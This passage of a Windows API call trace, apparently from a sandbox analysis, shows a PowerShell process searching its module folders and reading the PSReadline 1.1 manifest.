	[0048.087] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*", lpFindFileData=0x184c18d7c0 | out: lpFindFileData=0x184c18d7c0) returned 0x1505fab78c0
	[0048.088] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.088] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.088] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.088] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.088] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.088] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 0
	[0048.088] FindClose (in: hFindFile=0x1505fab78c0 | out: hFindFile=0x1505fab78c0) returned 1
	[0048.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da70) returned 1
	[0048.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da30) returned 1
	[0048.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d990) returned 1
	[0048.088] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0x184c18d480, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c
	[0048.088] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\", nBufferLength=0x105, lpBuffer=0x184c18d420, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\", lpFilePart=0x0) returned 0x3d
	[0048.089] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*", lpFindFileData=0x184c18d630 | out: lpFindFileData=0x184c18d630) returned 0x1505fab7f20
	[0048.089] FindNextFileW (in: hFindFile=0x1505fab7f20, lpFindFileData=0x184c18d680 | out: lpFindFileData=0x184c18d680) returned 1
	[0048.089] FindNextFileW (in: hFindFile=0x1505fab7f20, lpFindFileData=0x184c18d680 | out: lpFindFileData=0x184c18d680) returned 1
	[0048.089] FindNextFileW (in: hFindFile=0x1505fab7f20, lpFindFileData=0x184c18d680 | out: lpFindFileData=0x184c18d680) returned 0
	[0048.089] FindClose (in: hFindFile=0x1505fab7f20 | out: hFindFile=0x1505fab7f20) returned 1
	[0048.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d8e0) returned 1
	[0048.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d8a0) returned 1
	[0048.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d990) returned 1
	[0048.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0x184c18d480, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c
	[0048.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\", nBufferLength=0x105, lpBuffer=0x184c18d420, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\", lpFilePart=0x0) returned 0x3d
	[0048.090] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*", lpFindFileData=0x184c18d630 | out: lpFindFileData=0x184c18d630) returned 0x1505fab85e0
	[0048.090] FindNextFileW (in: hFindFile=0x1505fab85e0, lpFindFileData=0x184c18d680 | out: lpFindFileData=0x184c18d680) returned 1
	[0048.090] FindNextFileW (in: hFindFile=0x1505fab85e0, lpFindFileData=0x184c18d680 | out: lpFindFileData=0x184c18d680) returned 1
	[0048.090] FindNextFileW (in: hFindFile=0x1505fab85e0, lpFindFileData=0x184c18d680 | out: lpFindFileData=0x184c18d680) returned 0
	[0048.090] FindClose (in: hFindFile=0x1505fab85e0 | out: hFindFile=0x1505fab85e0) returned 1
	[0048.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d8e0) returned 1
	[0048.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d8a0) returned 1
	[0048.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0x184c18d580, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c
	[0048.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d9c0) returned 1
	[0048.090] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en"), fInfoLevelId=0x0, lpFileInformation=0x184c18daa0 | out: lpFileInformation=0x184c18daa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0048.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d980) returned 1
	[0048.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d9f0) returned 1
	[0048.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0x184c18d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c
	[0048.091] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\", nBufferLength=0x105, lpBuffer=0x184c18d480, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\", lpFilePart=0x0) returned 0x3d
	[0048.091] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*", lpFindFileData=0x184c18d690 | out: lpFindFileData=0x184c18d690) returned 0x1505fab78c0
	[0048.092] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d6e0 | out: lpFindFileData=0x184c18d6e0) returned 1
	[0048.092] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d6e0 | out: lpFindFileData=0x184c18d6e0) returned 1
	[0048.092] FindNextFileW (in: hFindFile=0x1505fab78c0, lpFindFileData=0x184c18d6e0 | out: lpFindFileData=0x184c18d6e0) returned 0
	[0048.092] FindClose (in: hFindFile=0x1505fab78c0 | out: hFindFile=0x1505fab78c0) returned 1
	[0048.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d940) returned 1
	[0048.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d900) returned 1
	[0048.092] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.psd1")) returned 0xffffffff
	[0048.092] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.psm1")) returned 0xffffffff
	[0048.092] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.cdxml")) returned 0xffffffff
	[0048.092] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.xaml")) returned 0xffffffff
	[0048.092] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.dll")) returned 0xffffffff
	[0048.093] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0x184c18d710, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39
	[0048.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db50) returned 1
	[0048.093] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1"), fInfoLevelId=0x0, lpFileInformation=0x184c18dc30 | out: lpFileInformation=0x184c18dc30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0048.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18db10) returned 1
	[0048.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db80) returned 1
	[0048.093] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0x184c18d670, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39
	[0048.093] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\", lpFilePart=0x0) returned 0x3a
	[0048.093] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*", lpFindFileData=0x184c18d820 | out: lpFindFileData=0x184c18d820) returned 0x1505fab7860
	[0048.093] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.094] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.094] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.094] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.094] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.094] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 0
	[0048.094] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0048.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dad0) returned 1
	[0048.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da90) returned 1
	[0048.094] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.psd1")) returned 0xffffffff
	[0048.094] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.psm1")) returned 0xffffffff
	[0048.094] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.cdxml")) returned 0xffffffff
	[0048.095] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.xaml")) returned 0xffffffff
	[0048.095] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.dll")) returned 0xffffffff
	[0048.095] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35
	[0048.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.095] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0048.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.095] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35
	[0048.095] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", lpFilePart=0x0) returned 0x36
	[0048.095] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7320
	[0048.095] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0048.095] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0048.095] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0048.096] FindClose (in: hFindFile=0x1505fab7320 | out: hFindFile=0x1505fab7320) returned 1
	[0048.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.096] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x184c18d910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49
	[0048.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd50) returned 1
	[0048.096] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de30 | out: lpFileInformation=0x184c18de30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1)) returned 1
	[0048.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd10) returned 1
	[0048.096] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49
	[0048.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18daf0) returned 1
	[0048.096] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x67c
	[0048.096] GetFileType (hFile=0x67c) returned 0x1
	[0048.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da60) returned 1
	[0048.096] GetFileType (hFile=0x67c) returned 0x1
	[0048.096] ReadFile (in: hFile=0x67c, lpBuffer=0x1504748e628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x1504748e628*, lpNumberOfBytesRead=0x184c18dbc8*=0x2e1, lpOverlapped=0x0) returned 1
	[0048.097] ReadFile (in: hFile=0x67c, lpBuffer=0x1504748e628, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x1504748e628*, lpNumberOfBytesRead=0x184c18dbc8*=0x0, lpOverlapped=0x0) returned 1
	[0048.097] CloseHandle (hObject=0x67c) returned 1
	[0048.097] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psd1")) returned 0xffffffff
	[0048.097] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psm1")) returned 0xffffffff
	[0048.098] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.cdxml")) returned 0xffffffff
	[0048.098] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.xaml")) returned 0xffffffff
	[0048.098] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.dll")) returned 0xffffffff
	[0048.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de70) returned 1
	[0048.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18de30) returned 1
	[0048.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dea0) returned 1
	[0048.099] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x184c18db40 | out: lpFindFileData=0x184c18db40) returned 0x1505fab7d40
	[0048.100] FindNextFileW (in: hFindFile=0x1505fab7d40, lpFindFileData=0x184c18db90 | out: lpFindFileData=0x184c18db90) returned 1
	[0048.100] FindNextFileW (in: hFindFile=0x1505fab7d40, lpFindFileData=0x184c18db90 | out: lpFindFileData=0x184c18db90) returned 1
	[0048.100] FindNextFileW (in: hFindFile=0x1505fab7d40, lpFindFileData=0x184c18db90 | out: lpFindFileData=0x184c18db90) returned 1
	[0048.100] FindNextFileW (in: hFindFile=0x1505fab7d40, lpFindFileData=0x184c18db90 | out: lpFindFileData=0x184c18db90) returned 1
	[0048.100] FindNextFileW (in: hFindFile=0x1505fab7d40, lpFindFileData=0x184c18db90 | out: lpFindFileData=0x184c18db90) returned 1
	[0048.100] FindNextFileW (in: hFindFile=0x1505fab7d40, lpFindFileData=0x184c18db90 | out: lpFindFileData=0x184c18db90) returned 0
	[0048.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18ddf0) returned 1
	[0048.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18ddb0) returned 1
	[0048.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de40) returned 1
	[0048.101] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*", lpFindFileData=0x184c18dae0 | out: lpFindFileData=0x184c18dae0) returned 0x1505fab7920
	[0048.101] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0048.101] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0048.101] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0048.101] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0048.101] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0048.101] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18db30 | out: lpFindFileData=0x184c18db30) returned 1
	[0048.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd90) returned 1
	[0048.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0048.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de40) returned 1
	[0048.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd90) returned 1
	[0048.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0048.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
